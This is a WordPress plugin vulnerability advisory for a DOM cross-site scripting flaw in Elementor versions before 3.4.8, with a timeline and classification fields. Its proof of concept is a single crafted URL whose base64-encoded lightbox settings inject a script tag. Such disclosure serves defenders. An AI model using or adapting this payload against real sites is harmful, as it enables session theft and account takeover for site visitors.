WordPress Plugin Vulnerabilities
Elementor < 3.4.8 - DOM Cross-Site-Scripting
Description
The plugin does not sanitise or escape user input appended to the DOM via a malicious hash, resulting in a DOM Cross-Site Scripting issue.
The issue was initially fixed in 3.1.4, however re-introduced in 3.2.0.
Proof of Concept
https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Joel
Submitter
Joel
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-24 (about 3 years ago)
Added
2021-10-20 (about 2 years ago)
Last Updated
2022-04-14 (about 2 years ago)